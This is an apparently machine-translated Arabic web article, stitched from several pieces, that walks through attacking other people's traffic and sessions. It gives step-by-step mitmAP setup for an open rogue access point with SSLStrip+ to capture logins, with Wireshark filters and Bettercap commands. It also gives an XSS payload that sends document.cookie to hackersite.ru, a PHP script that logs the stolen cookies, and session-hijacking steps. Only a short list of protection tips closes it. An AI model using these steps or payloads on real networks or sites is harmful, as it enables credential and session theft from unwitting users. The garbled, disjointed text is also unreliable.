وهكذا، قمنا بدراسة كيفية استخدام البرمجيات لاعتراض البيانات داخل الشبكة. لقد نظرنا في العديد من الهجمات المحددة التي تسمح لك بالحصول على بيانات تسجيل الدخول، بالإضافة إلى معلومات أخرى. بالإضافة إلى ذلك، نظرنا إلى SoftPerfect WiFi Guard، والذي يسمح لك بحماية شبكتك المحلية من التنصت على حركة المرور على المستوى البدائي.

ويقوم بتشغيلها تلقائيًا، وبفضل ذلك يتم تحقيق تجاوز HTTPS / HSTS. مع mitmAP، لا تحتاج إلى الدخول في هذه العملية، ولكن إذا كنت تريد القيام بشيء مشابه، على سبيل المثال باستخدام create_ap، فراجع "تعليمات استخدام SSLStrip+ وdns2proxy لتجاوز HSTS".

يتيح لك mitmAP استخدام أكثر الطرق فعالية للرجوع إلى إصدار أقدم من HTTPS إلى HTTP دون الحاجة إلى إدخال أوامر فعليًا (وعدم فهم آلية تجاوز HTTPS). في اختباراتي، تم إرسال كلمة المرور بنص واضح لـ vk.com، yandex.ru، mail.ru.

تم إنشاء هذا البرنامج النصي في نسختين - للعمل في Kali Linux أو Raspberry PI.

يجب أن يعمل البرنامج النصي على مشتقات دبيان إذا قمت بتثبيت التبعيات؛ ولكنها لن تعمل، على سبيل المثال، في Arch Linux / BlackArch بسبب الطريقة التي اختارها المؤلف لبدء الخدمات.

تعليمات لاستخدام mitmAP

تحميل البرنامج النصي:

استنساخ البوابة https://github.com/xdavidhu/mitmAP.git cd mitmAP/

شغلها:

سودو بيثون3 mitmAP.py

سيبدأ السيناريو بسؤال:

[؟] تثبيت/تحديث التبعيات؟ نعم / لا:

الترجمة: تثبيت/تحديث التبعيات؟

إذا كنت تطلق لأول مرة، فوافق، أي. اضغط دخول. في المستقبل يمكنك الاختيار ن(لا).

السؤال التالي:

[؟] يرجى إدخال اسم الواجهة اللاسلكية الخاصة بك (لنقطة الوصول):

الترجمة: أدخل اسم الواجهة اللاسلكية الخاصة بك (لـ AP). إذا كنت لا تعرف اسم واجهاتك، فقم بتشغيل الأمر في نافذة أخرى:

وسوف تظهر كافة واجهات الشبكة على النظام الخاص بك. والفريق

سودو آيو ديف

سوف تظهر واجهات الشبكة اللاسلكية فقط.

عادةً ما يتم استدعاء الواجهة اللاسلكية في Kali Linux wlan0(وإذا كان هناك اثنان فالثاني يحمل اسم wlan1).

[؟] الرجاء إدخال اسم الواجهة المتصلة بالإنترنت:

الترجمة: الرجاء إدخال اسم الواجهة المتصلة بالإنترنت.

عادةً ما يتم استدعاء الواجهة السلكية في Kali Linux إيث0. يمكنك أيضًا استخدام بطاقة Wi-Fi ثانية للاتصال بالإنترنت.

[؟] هل تستخدم SSLSTRIP 2.0؟ نعم / لا:

الترجمة: يسأل البرنامج النصي ما إذا كان سيتم استخدام SSLStrip+ . في الوقت الحاضر، عندما يتم نقل جزء كبير، إن لم يكن معظم، من حركة المرور عبر HTTPS (المشفر)، يوصى بشدة بهذا الخيار.

[؟] قم بإنشاء ملف تكوين HOSTAPD جديد على "/etc/hostapd/hostapd.conf" نعم/لا:

الترجمة: هل يجب علي إنشاء ملف تكوين hostapd جديد.

إذا كنت تبدأ ذلك لأول مرة، فيجب القيام بذلك. أثناء عمليات التشغيل اللاحقة، إذا كنت لن تقوم بتغيير إعدادات AP، فيمكنك التحديد ن(أي "لا").

إعداد نقطة الوصول:

[؟] الرجاء إدخال SSID لنقطة الوصول:

الترجمة: أدخل اسمًا لنقطة الوصول.

[؟] الرجاء الدخول إلى قناة AP:

الترجمة: أدخل رقم قناة AP.

[؟] تمكين تشفير WPA2؟ ص / لا:

الترجمة: هل يجب علي تمكين تشفير WPA2؟

إذا قمت بتمكين التشفير، فستحتاج إلى إدخال كلمة مرور للاتصال بنقطة الوصول الخاصة بك. لأغراضنا، نختار "لا".

آخر إعدادات AP:

[؟] تعيين الحد الأقصى للسرعة للعملاء؟ نعم / لا:

الترجمة: هل يجب أن أضع حدًا للسرعة للعملاء؟

اخترت لا

[؟] هل تريد تشغيل WIRESHARK على wlan0؟ نعم / لا:

تحليل بيانات mitmAP

يعرض mitmAP البيانات التي تم اعتراضها، بما في ذلك تسجيلات الدخول وكلمات المرور، في نافذته الرئيسية:

في مجلدها تقوم بإنشاء دليل السجلاتمع ملفين: mitmap-sslstrip.logو mitmap-wireshark.pcap. يحتوي الملف الأول على البيانات التي تم جمعها في شكل نص. والثاني مخصص للتحليل في برنامج Wireshark.

يرجى ملاحظة: عند إعادة تشغيل البرنامج، تتم الكتابة فوق هذه الملفات! أولئك. إذا كنت تنوي تحليل هذه الملفات لاحقا، فأنت بحاجة إلى الاهتمام بنقلها أو إعادة تسميتها، وإلا فسيتم حذفها ببساطة.

إذا اخترت تشغيل نافذة Wireshark وعرض الصور المنقولة باستخدام Driftnet، فيمكنك أيضًا استخدامها لمراقبة البيانات المنقولة في الوقت الفعلي.

تحليل البيانات في Wireshark

يحتوي Wireshark على مرشح بيانات مفصل للغاية، ويمكنك رؤية تنوعه على صفحة الوثائق الرسمية

سأقدم أمثلة على العديد من المرشحات قيد التشغيل.

لعرض جميع طلبات HTTP المرسلة باستخدام طريقة POST في Wireshark:

Http.request.method == "POST"

لعرض البيانات المرسلة أو المستلمة من مجال معين (بدلاً من أدخل المجال محل الاهتمام، على سبيل المثال، vk.com):

http.host== "

للبحث عن سلسلة في الدفق الكامل للبيانات المرسلة، يتم استخدام عامل التصفية التالي (بدلاً من<строка>أدخل السلسلة التي تريد البحث عنها):

يحتوي الإطار على "<строка>"

لعرض ملفات تعريف الارتباط في Wireshark:

http.cookie

إذا كنت مهتمًا بملفات تعريف الارتباط ذات اسم محدد، فاستخدم:

يحتوي ملف تعريف الارتباط Http على "<имя_куки>"

لإظهار الطلبات في Wireshark المرسلة باستخدام طريقة GET أو POST:

يحتوي Http.request.uri على "؟" أو http.request.method=="POST"

إذا كنت تريد البحث عن البيانات المتبادلة مع خادم FTP، فيمكنك في Wireshark استخدام أحد عوامل التصفية التالية:

Tcp.port==21 || tcp.port==20

استنشاق البيانات في البرامج الأخرى

على الرغم من أن mitmAP يستخدم برامج مثيرة للاهتمام، إلا أنه يمكنك دائمًا إجراء تحليل البيانات باستخدام أدوات أخرى. على سبيل المثال، إذا كنت تريد استخدام Bettercap، فأنت بحاجة إلى مراعاة ما يلي:

  • ليست هناك حاجة لتزييف ARP
  • لا حاجة لاكتشاف العميل
  • ليست هناك حاجة لتمكين SSLStrip.

أولئك. قد يبدو الأمر كما يلي:

Sudo Bettercap -X -I wlan0 -S NONE --no-discovery

Sudo Bettercap -X -I wlan0 -S NONE --no-discovery --proxy --no-sslstrip

إيقاف تشغيل mitmAP

لإيقاف تشغيل البرنامج، اضغط مرتين بسرعة CTRL+C. اسمحوا لي أن أذكرك أنه عند تشغيل البرنامج مرة أخرى، فإنه سيتم استبدال الملفات بالبيانات المستلمة. أولئك. تحتاج إلى نقلها إلى مجلد آخر إذا كنت تريد تحليلها لاحقًا.

ما هو ملف تعريف الارتباط؟

هناك آلية تسمح لخادم http بحفظ بعض المعلومات النصية على جهاز الكمبيوتر الخاص بالمستخدم ومن ثم الوصول إليها. تسمى هذه المعلومات ملف تعريف الارتباط. بشكل أساسي، كل ملف تعريف ارتباط هو زوج: اسم المعلمة وقيمتها. يتم أيضًا تعيين المجال الذي ينتمي إليه لكل ملف تعريف ارتباط. لأسباب أمنية، في جميع المتصفحات، يُسمح لخادم http فقط بالوصول إلى ملف تعريف الارتباط الخاص بنطاقه. بالإضافة إلى ذلك، قد يكون لملفات تعريف الارتباط تاريخ انتهاء الصلاحية، وفي هذه الحالة سيتم تخزينها على الكمبيوتر حتى هذا التاريخ، حتى لو قمت بإغلاق كافة نوافذ المتصفح.


لماذا تعتبر ملفات تعريف الارتباط مهمة؟

تستخدم جميع الأنظمة متعددة المستخدمين ملفات تعريف الارتباط لتحديد هوية المستخدم. بتعبير أدق، اتصال المستخدم الحالي بالخدمة، جلسة المستخدم. إذا تعرف شخص ما على ملفات تعريف الارتباط الخاصة بك، فسيتمكن من تسجيل الدخول إلى النظام نيابةً عنك. لأنه في الوقت الحالي، يقوم عدد قليل جدًا من موارد الإنترنت بالتحقق من تغييرات عنوان IP أثناء جلسة مستخدم واحدة.


كيفية تغيير أو استبدال ملفات تعريف الارتباط؟

لا يوفر مطورو المتصفح أدوات مدمجة لتحرير ملفات تعريف الارتباط. ولكن يمكنك القيام بذلك باستخدام المفكرة العادية.


الخطوة 1: إنشاء ملف نصي مع النص

محرر سجل ويندوز الإصدار 5.00



@="C:\\IE_ext.htm"

احفظه تحت اسم IE_ext.reg

الخطوة 2: باستخدام الملف الذي تم إنشاؤه، قم بإضافة التغييرات إلى سجل Windows.

الخطوة 3: إنشاء ملف نصي مع النص

< script لغة = "جافا سكريبت">
External.menuArguments.clipboardData.setData("Text" , External.menuArguments.document.cookie);

External.menuArguments.document.cookie= "اسم الاختبار = قيمة الاختبار؛ المسار =/؛ المجال = testdomain.ru";
تنبيه (external.menuArguments.document.cookie)؛


احفظه تحت الاسم C:\IE_ext.htm

الخطوة 4: نذهب إلى الموقع الذي نهتم به.

الخطوة 5: انقر بزر الماوس الأيمن على مساحة فارغة في الصفحة وحدد عنصر القائمة "العمل مع ملفات تعريف الارتباط". السماح بالوصول إلى الحافظة. سيتم نقل ملفات تعريف الارتباط الخاصة بك من هذا الموقع إلى الحافظة. يمكنك إدراج المفكرة الخاصة بهم وإلقاء نظرة.


الخطوة 6: لتغيير بعض ملفات تعريف الارتباط، قم بتحرير الملف C:\IE_ext.htm، واستبداله اسم الاختبارباسم الكعكة، قيمة الاختبار- على معناها، testdomain.ru– إلى مجال الموقع. إذا لزم الأمر، أضف المزيد من الخطوط المشابهة. لسهولة التحكم، أضفت إلى البرنامج النصي مخرجات ملفات تعريف الارتباط الحالية قبل التغيير وبعده: تنبيه (external.menuArguments.document.cookie)؛

الخطوة 7: قم بتنفيذ الخطوة 5 مرة أخرى، ثم قم بتحديث الصفحة.

خلاصة القول: سنصل إلى مورد الإنترنت هذا بملفات تعريف الارتباط المحدثة.

كيفية سرقة ملفات تعريف الارتباط باستخدام جافا سكريبت؟

إذا تمكن أحد المهاجمين من إيجاد فرصة لتنفيذ برنامج JavaScript عشوائي على جهاز الكمبيوتر الخاص بالضحية، فيمكنه قراءة ملفات تعريف الارتباط الحالية بسهولة شديدة. مثال:


var str= document.cookie;

ولكن هل سيتمكن من نقلها إلى موقعه، لأنه، كما أشرت سابقًا، لن يتمكن سكريبت JavaScript من الوصول إلى موقع موجود في نطاق مختلف دون تأكيد إضافي؟ اتضح أن برنامج JavaScript النصي يمكنه تحميل أي صورة موجودة على أي خادم http. وفي نفس الوقت، قم بنقل أي معلومات نصية في طلب التنزيل إلى هذه الصورة. مثال: http://hackersite.ru/xss.jpg?text_infoلذلك إذا قمت بتشغيل هذا الرمز:

فار img= صورة جديدة()؛

img.src= "http://hackersite.ru/xss.jpg؟"+ encodeURI(document.cookie);


ثم سينتهي ملف تعريف الارتباط في طلب تنزيل "الصورة" وسوف "ينتقل" إلى المهاجم.

كيفية التعامل مع مثل هذه الطلبات لتنزيل "صورة"؟

يحتاج المهاجم فقط إلى العثور على استضافة تدعم PHP ووضع رمز مثل هذا هناك:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt"،"a");
fputs($fp,"$uid\n");
fClose($fp);
?>

ثم سيتم حفظ كافة معلمات الطلب لهذا البرنامج النصي في الملف log.txt. كل ما تبقى هو استبدال برنامج JavaScript الموصوف مسبقًا http://hackersite.ru/xss.jpgإلى المسار إلى هذا البرنامج النصي PHP.


الحد الأدنى

لقد أظهرت فقط أبسط طريقة لاستغلال ثغرات XSS. ولكن هذا يثبت أن وجود ثغرة أمنية واحدة على الأقل على موقع إنترنت متعدد المستخدمين يمكن أن يسمح للمهاجم باستخدام موارده نيابةً عنك.

بسكويت - المعلومات على شكل ملف نصي محفوظ على جهاز الكمبيوتر الخاص بالمستخدم بواسطة الموقع. يحتوي على بيانات المصادقة (تسجيل الدخول/كلمة المرور، المعرف، رقم الهاتف، عنوان صندوق البريد)، إعدادات المستخدم، حالة الوصول. المخزنة في ملف تعريف المتصفح.

اختراق ملفات تعريف الارتباط هي سرقة (أو "اختطاف") لجلسة زائر مورد الويب. تصبح المعلومات الخاصة متاحة ليس فقط للمرسل والمستلم، ولكن أيضًا لطرف ثالث - الشخص الذي قام بالاعتراض.

أدوات وتقنيات اختراق ملفات تعريف الارتباط

لصوص الكمبيوتر، مثل زملائهم في الحياة الحقيقية، بالإضافة إلى المهارات والبراعة والمعرفة، بالطبع، لديهم أيضًا أدواتهم الخاصة - نوع من ترسانة المفاتيح الرئيسية والتحقيقات. دعونا نلقي نظرة على الحيل الأكثر شيوعًا التي يستخدمها المتسللون لاستخراج ملفات تعريف الارتباط من مستخدمي الإنترنت.

المتشممون

برامج خاصة لرصد وتحليل حركة مرور الشبكة. اسمهم يأتي من الفعل الإنجليزي "شم" (شم)، لأنه. حرفيًا "استنشاق" الحزم المنقولة بين العقد.

لكن المهاجمين يستخدمون أداة الشم لاعتراض بيانات الجلسة والرسائل والمعلومات السرية الأخرى. أهداف هجماتهم هي في الأساس شبكات غير محمية، حيث يتم إرسال ملفات تعريف الارتباط في جلسة HTTP مفتوحة، أي أنها غير مشفرة عمليًا. (شبكة Wi-Fi العامة هي الأكثر عرضة للخطر في هذا الصدد.)

لتضمين أداة الشم في قناة الإنترنت بين عقدة المستخدم وخادم الويب، يتم استخدام الطرق التالية:

  • "الاستماع" إلى واجهات الشبكة (المحاور والمحولات)؛
  • التفرع ونسخ حركة المرور.
  • الاتصال بفجوة قناة الشبكة؛
  • التحليل من خلال الهجمات الخاصة التي تعيد توجيه حركة مرور الضحية إلى المتشمم (انتحال MAC، انتحال IP).

يشير الاختصار XSS إلى البرمجة النصية للمواقع المتقاطعة. يستخدم لمهاجمة مواقع الويب لسرقة بيانات المستخدم.

مبدأ XSS هو كما يلي:

  • يقوم المهاجم بإدراج تعليمات برمجية ضارة (برنامج نصي مقنع خاص) في صفحة ويب خاصة بموقع ويب أو منتدى أو في رسالة (على سبيل المثال، عند المراسلة على شبكة اجتماعية)؛
  • ينتقل الضحية إلى الصفحة المصابة ويقوم بتنشيط الكود المثبت على جهاز الكمبيوتر الخاص به (النقر، اتباع الرابط، وما إلى ذلك)؛
  • وبدوره، "يستخرج" الكود الخبيث الذي تم تنفيذه البيانات السرية للمستخدم من المتصفح (على وجه الخصوص، ملفات تعريف الارتباط) ويرسلها إلى خادم الويب الخاص بالمهاجم.

من أجل "زرع" آلية XSS البرمجية، يستخدم المتسللون جميع أنواع نقاط الضعف في خوادم الويب والخدمات عبر الإنترنت والمتصفحات.

تنقسم جميع ثغرات XSS إلى نوعين:

  • سلبي. يتم الحصول على الهجوم عن طريق طلب برنامج نصي محدد على صفحة ويب. يمكن إدخال تعليمات برمجية ضارة في نماذج مختلفة على صفحة ويب (على سبيل المثال، في شريط البحث الخاص بالموقع). الأكثر عرضة لـ XSS السلبي هي الموارد التي لا تقوم بتصفية علامات HTML عند وصول البيانات؛
  • نشيط. تقع مباشرة على الخادم. ويتم تفعيلها في متصفح الضحية. يتم استخدامها بشكل نشط من قبل المحتالين في جميع أنواع المدونات والمحادثات وموجزات الأخبار.

يقوم المتسللون "بتمويه" نصوص XSS الخاصة بهم بعناية حتى لا يشك الضحية في أي شيء. يقومون بتغيير امتداد الملف، وتمرير الكود كصورة، وتحفيزهم على اتباع الرابط، وجذبهم بمحتوى مثير للاهتمام. نتيجة لذلك: يرسل مستخدم الكمبيوتر الشخصي، غير القادر على التحكم في فضوله، بيده (بنقرة ماوس) ملفات تعريف الارتباط للجلسة (مع تسجيل الدخول وكلمة المرور!) إلى مؤلف البرنامج النصي XSS - شرير الكمبيوتر.

استبدال ملفات تعريف الارتباط

يتم حفظ جميع ملفات تعريف الارتباط وإرسالها إلى خادم الويب (الذي "أتت منه") دون أي تغييرات - في شكلها الأصلي - بنفس القيم والسلاسل والبيانات الأخرى. ويسمى التعديل المتعمد لمعلماتها باستبدال ملفات تعريف الارتباط. بمعنى آخر، عند استبدال ملفات تعريف الارتباط، يتظاهر المهاجم بالتمني. على سبيل المثال، عند إجراء الدفع في متجر عبر الإنترنت، يغير ملف تعريف الارتباط مبلغ الدفع إلى الأسفل - وبالتالي يحدث "توفير" في المشتريات.

يتم "إدراج" ملفات تعريف الارتباط المسروقة للجلسة على شبكة التواصل الاجتماعي من حساب شخص آخر في جلسة أخرى وعلى جهاز كمبيوتر آخر. يحصل مالك ملفات تعريف الارتباط المسروقة على حق الوصول الكامل إلى حساب الضحية (المراسلات والمحتوى وإعدادات الصفحة) طالما أنها موجودة على صفحتها.

يتم تنفيذ ملفات تعريف الارتباط "التحريرية" باستخدام:

  • وظائف "إدارة ملفات تعريف الارتباط..." في متصفح Opera؛
  • مدير ملفات تعريف الارتباط والإضافات المتقدمة لمدير ملفات تعريف الارتباط لمتصفح فايرفوكس؛
  • أدوات IECookiesView المساعدة (Internet Explorer فقط)؛
  • محرر نصوص مثل AkelPad أو NotePad أو Windows Notepad.

الوصول المادي إلى البيانات

مخطط التنفيذ بسيط للغاية، ويتكون من عدة خطوات. ولكنها تكون فعالة فقط إذا تم ترك جهاز الكمبيوتر الخاص بالضحية ذو الجلسة المفتوحة، على سبيل المثال فكونتاكتي، دون مراقبة (ولفترة طويلة!):

  1. يتم إدخال وظيفة جافا سكريبت في شريط عنوان المتصفح لعرض جميع ملفات تعريف الارتباط المحفوظة.
  2. بعد الضغط على "ENTER" تظهر جميعها على الصفحة.
  3. يتم نسخ ملفات تعريف الارتباط وحفظها في ملف ثم نقلها إلى محرك أقراص فلاش.
  4. على جهاز كمبيوتر آخر، يتم استبدال ملفات تعريف الارتباط في جلسة جديدة.
  5. يتم منح الوصول إلى حساب الضحية.

كقاعدة عامة، يستخدم المتسللون الأدوات المذكورة أعلاه (+ أدوات أخرى) معًا (نظرًا لأن مستوى الحماية في العديد من موارد الويب مرتفع جدًا) وبشكل منفصل (عندما يكون المستخدمون ساذجين بشكل مفرط).

XSS + الشم

  1. يتم إنشاء برنامج نصي XSS، والذي يحدد عنوان المتسلل عبر الإنترنت (إما محلي الصنع أو خدمة معينة).
  2. يتم حفظ التعليمات البرمجية الضارة بالملحق .img (تنسيق الصورة).
  3. يتم بعد ذلك تحميل هذا الملف إلى صفحة موقع ويب أو دردشة أو رسالة شخصية - حيث سيتم تنفيذ الهجوم.
  4. يتم لفت انتباه المستخدم إلى "الفخ" الذي تم إنشاؤه (وهذا هو المكان الذي تدخل فيه الهندسة الاجتماعية حيز التنفيذ).
  5. إذا تم تشغيل المصيدة، فسيتم اعتراض ملفات تعريف الارتباط من متصفح الضحية بواسطة المتشمم.
  6. يفتح المهاجم سجلات الشم ويسترد ملفات تعريف الارتباط المسروقة.
  7. بعد ذلك، يقوم بإجراء استبدال للحصول على حقوق صاحب الحساب باستخدام الأدوات المذكورة أعلاه.

حماية ملفات تعريف الارتباط من القرصنة

  1. استخدم اتصالاً مشفرًا (باستخدام البروتوكولات وطرق الأمان المناسبة).
  2. لا تستجيب للروابط أو الصور أو العروض المغرية المشكوك فيها لتتعرف على "البرمجيات المجانية الجديدة". وخاصة من الغرباء.
  3. استخدم فقط موارد الويب الموثوقة.
  4. قم بإنهاء الجلسة المعتمدة بالنقر فوق الزر "تسجيل الخروج" (وليس فقط إغلاق علامة التبويب!). خاصة إذا قمت بتسجيل الدخول إلى حسابك ليس من جهاز كمبيوتر شخصي، ولكن، على سبيل المثال، من جهاز كمبيوتر في مقهى إنترنت.
  5. لا تستخدم ميزة "حفظ كلمة المرور" الخاصة بالمتصفح. تزيد بيانات التسجيل المخزنة من خطر السرقة بشكل كبير. لا تكن كسولًا، ولا تضيع بضع دقائق من الوقت في إدخال كلمة المرور الخاصة بك وتسجيل الدخول في بداية كل جلسة.
  6. بعد تصفح الويب - زيارة الشبكات الاجتماعية والمنتديات والمحادثات ومواقع الويب - احذف ملفات تعريف الارتباط المحفوظة وامسح ذاكرة التخزين المؤقت للمتصفح.
  7. قم بتحديث المتصفحات وبرامج مكافحة الفيروسات بانتظام.
  8. استخدم ملحقات المتصفح التي تحمي من هجمات XSS (على سبيل المثال، NoScript for FF وGoogle Chrome).
  9. بشكل دوري في الحسابات.

والأهم من ذلك، ألا تفقد يقظتك وانتباهك أثناء الاسترخاء أو العمل على الإنترنت!

أخبر الأصدقاء